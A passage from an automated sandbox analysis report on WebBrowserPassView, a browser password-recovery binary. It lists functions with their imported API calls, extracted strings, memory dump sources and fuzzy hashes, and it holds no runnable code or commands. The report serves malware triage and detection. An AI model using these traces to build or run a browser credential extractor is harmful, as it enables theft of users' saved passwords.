GetWindowTextW.USER32 ref: 0040DD8D
memset.MSVCRT ref: 0040DDB4
GetClassNameW.USER32 ref: 0040DDCB
_wcsicmp.MSVCRT ref: 0040DDDD

Part of subcall function 0040DC1C: memset.MSVCRT ref: 0040DC2F
Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D

Strings

sysdatetimepick32, xrefs: 0040DDD7

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 8102298fea940e88dbedffba4a1eb78ca5cb1cc1c3ab67c0e4d17f8e38664f99
Instruction ID: 9b29a85ed4be641e65b10d3861343448fbe1dffed752f9636a38eeae2f61c522
Opcode Fuzzy Hash: 8102298fea940e88dbedffba4a1eb78ca5cb1cc1c3ab67c0e4d17f8e38664f99
Instruction Fuzzy Hash: 5F11CA329002197BEB14FB91CC49AEF77BCEF05350F004076F908D2092E7344A85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041D730 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041D868
memcpy.MSVCRT ref: 0041D87A
memcpy.MSVCRT ref: 0041D892
memcpy.MSVCRT ref: 0041D8AF
memcpy.MSVCRT ref: 0041D8C7
memset.MSVCRT ref: 0041D994

Strings

-wal, xrefs: 0041D8C1
-journal, xrefs: 0041D88C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: d779981db6e39aa48904ea1662bdb9d3095299d2377483bbb01f90ee736efe62
Instruction ID: de08a271c8033e28d41d160dfbeb7eb0a582d0ed0f381ff02535cf89bb22e03f
Opcode Fuzzy Hash: d779981db6e39aa48904ea1662bdb9d3095299d2377483bbb01f90ee736efe62
Instruction Fuzzy Hash: FFA1C1B1E04606AFDB14DF64C8417DEBBB0FF05314F14826EE46997382D738AA95CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407278 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0040731C
GetDlgItem.USER32 ref: 0040732F
GetDlgItem.USER32 ref: 00407344
GetDlgItem.USER32 ref: 0040735C
EndDialog.USER32(?,00000002), ref: 00407378
EndDialog.USER32(?,00000001), ref: 0040738D

Part of subcall function 00407037: GetDlgItem.USER32 ref: 00407044
Part of subcall function 00407037: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00407059

SendDlgItemMessageW.USER32 ref: 004073A5
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004074B6

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: 1b8c1b744b44118a1d00fc74b7d8bfeaf52c27222ffa2e36781ac251d1cb99c8
Instruction ID: 4d7fe854b84bffb36cdfb0f409f7702d3ffab78e9dfebf1b38e0a9661c8b6889
Opcode Fuzzy Hash: 1b8c1b744b44118a1d00fc74b7d8bfeaf52c27222ffa2e36781ac251d1cb99c8
Instruction Fuzzy Hash: 9261A330904B05ABEB31AF25C886A2BB7A5FF10314F00C63EFD01A66D1D778B955DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00446134 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004461B4
_wcsicmp.MSVCRT ref: 004461C9
_wcsicmp.MSVCRT ref: 004461DE

Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DC5
Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DCF
Part of subcall function 00409DB6: _memicmp.MSVCRT ref: 00409DEA

Strings

https://, xrefs: 00446176
http://, xrefs: 0044616B
log profile, xrefs: 00446142
signIn, xrefs: 004461D8
.save, xrefs: 004461AE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmp$wcslen$_memicmp
String ID: .save$http://$https://$log profile$signIn
API String ID: 1214746602-2708368587
Opcode ID: c25681c330007c681027023b8fef3e46109c9436a99cce23058c3c7b6e338d58
Instruction ID: 5e484990e1fe59e7fa87e07e780c8912ce5a7b58b3c72e29c52105d59935e75b
Opcode Fuzzy Hash: c25681c330007c681027023b8fef3e46109c9436a99cce23058c3c7b6e338d58
Instruction Fuzzy Hash: 824119711043019AF7306A65984136777D4DB47326F22896FFC6BE26C3EABCE885451F

Uniqueness

Uniqueness Score: -1.00%

Function 004074C6 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 004074D6
??3@YAXPAX@Z.MSVCRT ref: 004074F2
??2@YAPAXI@Z.MSVCRT ref: 00407518
memset.MSVCRT ref: 00407528
??2@YAPAXI@Z.MSVCRT ref: 00407557
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 004075A4
SetFocus.USER32(?,?,?,?), ref: 004075AD
??3@YAXPAX@Z.MSVCRT ref: 004075BD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 6121079746c87b66586f40a3fb7dab24c3698bded159a78e46110fef8cde2178
Instruction ID: aa93cf9892cb136432a885b6c040c00acd20fa1824247a7ddfcc4fe67478404c
Opcode Fuzzy Hash: 6121079746c87b66586f40a3fb7dab24c3698bded159a78e46110fef8cde2178
Instruction Fuzzy Hash: E031B0B1901201BFEB20AF29DD8591AB7A4FF04314B11853EF505E76A0D739EC80CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407784 Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 0040779B
GetWindow.USER32(?,00000005), ref: 004077B3
GetWindow.USER32(00000000), ref: 004077B6

Part of subcall function 00401E4A: GetWindowRect.USER32 ref: 00401E59

GetWindow.USER32(00000000,00000002), ref: 004077C2
GetDlgItem.USER32 ref: 004077D8
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00407817
GetDlgItem.USER32 ref: 00407821
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00407870

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Window$ItemMessageRectSend$Client
String ID:
API String ID: 2047574939-0
Opcode ID: fe54eeb19441843d95fdd849ea5d8071feeb7e1862c97c4ad6b95fcb8b242d9a
Instruction ID: 2817ce33af67de4568897f7594256d54fbf45e6d9d619dfc684942712a2cffd5
Opcode Fuzzy Hash: fe54eeb19441843d95fdd849ea5d8071feeb7e1862c97c4ad6b95fcb8b242d9a
Instruction Fuzzy Hash: 11219576A4030877E6023B719C47FAF275CAB85718F11403AFE01771C2DABA6D1645AF

Uniqueness

Uniqueness Score: -1.00%

Function 00409E39 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32(?,?,00411571,-00000210), ref: 00409E41
wcslen.MSVCRT ref: 00409E4E
GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411571,-00000210), ref: 00409E5E
GlobalLock.KERNEL32 ref: 00409E6B
memcpy.MSVCRT ref: 00409E74
GlobalUnlock.KERNEL32(00000000), ref: 00409E7D
SetClipboardData.USER32 ref: 00409E86
CloseClipboard.USER32(?,?,00411571,-00000210), ref: 00409E96

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: 0164f3b3879468f6eceab2dbe93e6c2e0c32735ab1d54ab091d60a667f6ded84
Instruction ID: ea904b1a76f59721029cddac23a3e6dc12fc942fabe90a21eef7b64a01167f20
Opcode Fuzzy Hash: 0164f3b3879468f6eceab2dbe93e6c2e0c32735ab1d54ab091d60a667f6ded84
Instruction Fuzzy Hash: 90F05B7B500228ABD2202FA5EC4DD5B776CDB86B9AB05013AF909D22529A245C0846B9

Uniqueness

Uniqueness Score: -1.00%

Function 00449D70 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 00449C90: memset.MSVCRT ref: 00449C9B
Part of subcall function 00449C90: memset.MSVCRT ref: 00449CAB
Part of subcall function 00449C90: memcpy.MSVCRT ref: 00449D0D
Part of subcall function 00449C90: memcpy.MSVCRT ref: 00449D5A

memcpy.MSVCRT ref: 00449E6F
memcpy.MSVCRT ref: 00449EBC
memcpy.MSVCRT ref: 00449F38

Part of subcall function 004499A0: memcpy.MSVCRT ref: 004499D2
Part of subcall function 004499A0: memcpy.MSVCRT ref: 00449A1E

memcpy.MSVCRT ref: 00449F88
memcpy.MSVCRT ref: 00449FC9
memcpy.MSVCRT ref: 00449FFA

Strings

gj, xrefs: 00449D89

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: gj
API String ID: 438689982-4203073231
Opcode ID: a1826e050d6e3d68a1f2c5dfa01eae9680517dde8f20abcfd8e35bf37672f032
Instruction ID: 3f3b464479e0d70e050848f60aaa72c5089d0acdf18e9fe99dc29a9aef4a41ed
Opcode Fuzzy Hash: a1826e050d6e3d68a1f2c5dfa01eae9680517dde8f20abcfd8e35bf37672f032
Instruction Fuzzy Hash: 6271B3B39083445BE310EF65D88099FB7E9ABD5348F050A2EF88997201E639DE09C797

Uniqueness

Uniqueness Score: -1.00%

Function 00407103 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0040711A
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00407133
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00407140
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0040714C
memset.MSVCRT ref: 004071B0
SendMessageW.USER32(?,0000105F,?,?), ref: 004071E5
SetFocus.USER32(?), ref: 0040726B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: 591c16118d863813ab471e160c4fd565b0629bf706d474ce27cebc159554fed7
Instruction ID: e2e651f42ab0d4b7e7b6f1b53d2a0dc89a1afd109539422a1d010a9987f6e0ab
Opcode Fuzzy Hash: 591c16118d863813ab471e160c4fd565b0629bf706d474ce27cebc159554fed7
Instruction Fuzzy Hash: 8C415A74901219FBDB20DF95CC459AFBFB9FF04354F1040AAF508A6291D374AA80CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F56C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

wcscat.MSVCRT ref: 0040F63B
_snwprintf.MSVCRT ref: 0040F662

Strings

 , xrefs: 0040F635
<td bgcolor=#%s nowrap>%s, xrefs: 0040F57C
<td bgcolor=#%s>%s, xrefs: 0040F58A
<tr>, xrefs: 0040F594

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 4bae3b1c020fc46a540f34cadb4edddbf196e78b99bdfbdb6ab0bb772013daad
Instruction ID: e0f29f3203d759466a2a243950708939727ff8ca945fdb9ba1a968257c2252f6
Opcode Fuzzy Hash: 4bae3b1c020fc46a540f34cadb4edddbf196e78b99bdfbdb6ab0bb772013daad
Instruction Fuzzy Hash: 8A31A031A00208EFCF10AF54CC85ADE7B75FF05324F11417AE805AB2A2D739AD55DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC55 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040DC6B
memset.MSVCRT ref: 0040DC8A
GetMenuItemInfoW.USER32 ref: 0040DCC6
wcschr.MSVCRT ref: 0040DCDE

Strings

6, xrefs: 0040DCAD
0, xrefs: 0040DCA5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: 0aaec32fb9f4fe92eeae193f48d1b194cbc3028e5b72559f9307ee4a45127174
Instruction ID: 965894ef64f39c048953856348d1c0b0167852fc172e3142d5b86853f7cdf95d
Opcode Fuzzy Hash: 0aaec32fb9f4fe92eeae193f48d1b194cbc3028e5b72559f9307ee4a45127174
Instruction Fuzzy Hash: B521F471909300ABD720DF91C845A9FB7E8FF85754F04093FFA4492290E779CA44C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0040523B Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 004053C0: GetLastError.KERNEL32(?,00000000,0040533E,?,?,?,00000000,00000000,?,00404787,?,?,00000060,00000000), ref: 004053D5

memset.MSVCRT ref: 00405271
memset.MSVCRT ref: 00405288
memset.MSVCRT ref: 0040529F
memcpy.MSVCRT ref: 004052B4
memcpy.MSVCRT ref: 004052C9

Strings

6, xrefs: 004052DF
\, xrefs: 004052D7

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$memcpy$ErrorLast
String ID: 6$\
API String ID: 404372293-1284684873
Opcode ID: a1a63dbf3b9459c821aff241a78b06548bfbfbca43745efa68bf068cdd8b3242
Instruction ID: 4d496e1acd8f7d0bb321dbc0636b4993eabad3a605fa072d2af56a88efec649e
Opcode Fuzzy Hash: a1a63dbf3b9459c821aff241a78b06548bfbfbca43745efa68bf068cdd8b3242
Instruction Fuzzy Hash: 7F2183B280121CBADF11AB99DC45EDF7BBCDF15344F0144A6F908E2152D2788F988F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040A62B Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A647
GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A673
GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A688
wcscpy.MSVCRT ref: 0040A698
wcscat.MSVCRT ref: 0040A6A5
wcscat.MSVCRT ref: 0040A6B4
wcscpy.MSVCRT ref: 0040A6C6

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: b58d772f936a03b258490eb3cb21bdc86c123face1b49a42d628fdd75bcc1e61
Instruction ID: 0243e103d97181127624a16127823fe836f95e320959a325dc59fd852366c67f
Opcode Fuzzy Hash: b58d772f936a03b258490eb3cb21bdc86c123face1b49a42d628fdd75bcc1e61
Instruction Fuzzy Hash: 08118F72900108BFEB20AF90DD45EEB777CEB01744F144076F605A2050E6359E898BBB

Uniqueness

Uniqueness Score: -1.00%

Function 004075C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00407670: FreeLibrary.KERNEL32(?,004075D1,00000000,00000000,?,0040B908,?,00000000,?), ref: 00407678

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(?,00000000), ref: 004075FC
GetProcAddress.KERNEL32(?,00000000), ref: 00407610
GetProcAddress.KERNEL32(?,00000000), ref: 00407623
GetProcAddress.KERNEL32(?,00000000), ref: 00407637
GetProcAddress.KERNEL32(?,00000000), ref: 0040764B

Strings

advapi32.dll, xrefs: 004075D1

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
String ID: advapi32.dll
API String ID: 2012295524-4050573280
Opcode ID: 33e7785ff47320705234322eea76ada849e33b817e3b8b7f6a9643b06ba54316
Instruction ID: b1f28a9f87d2897bb1716b12b8d83edd3b0eb137f397b03dff6d846beed85bc2
Opcode Fuzzy Hash: 33e7785ff47320705234322eea76ada849e33b817e3b8b7f6a9643b06ba54316
Instruction Fuzzy Hash: 13118FB0804B409EF6302F36DC0AE27BAB4DF40725F100D3FE082965E0DB79B854CA66

Uniqueness

Uniqueness Score: -1.00%

Function 0040A737 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A757
_snwprintf.MSVCRT ref: 0040A77E
wcscat.MSVCRT ref: 0040A790
wcscat.MSVCRT ref: 0040A7AD
wcscat.MSVCRT ref: 0040A7BC

Strings

%2.2X, xrefs: 0040A76D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: d8de8c6d683fe6c0a5c08c0a9bf4179f23b0233aed7098f39cd8b73d3a5c30e3
Instruction ID: 4776974aedcd9b8bea86e7681cb476536998a60eaa44b54f5b5777e80f521d0b
Opcode Fuzzy Hash: d8de8c6d683fe6c0a5c08c0a9bf4179f23b0233aed7098f39cd8b73d3a5c30e3
Instruction Fuzzy Hash: 29012872E003146AF73077159C86BBA33B8AB41B15F11803FFC54A61C2EA7CD9584A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB6F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FB94
memset.MSVCRT ref: 0040FBA9
_snwprintf.MSVCRT ref: 0040FBF6

Strings

<?xml version="1.0" ?>, xrefs: 0040FBBB
<%s>, xrefs: 0040FBE5
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040FBC2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 6f2a1b8eab8695b849e3f90b76870ba262ffa8b6eec972095743b55347378454
Instruction ID: f89c52ae9f649753db215819e8a95a7ceddb9bde2180362b42a5fc979dbbd26a
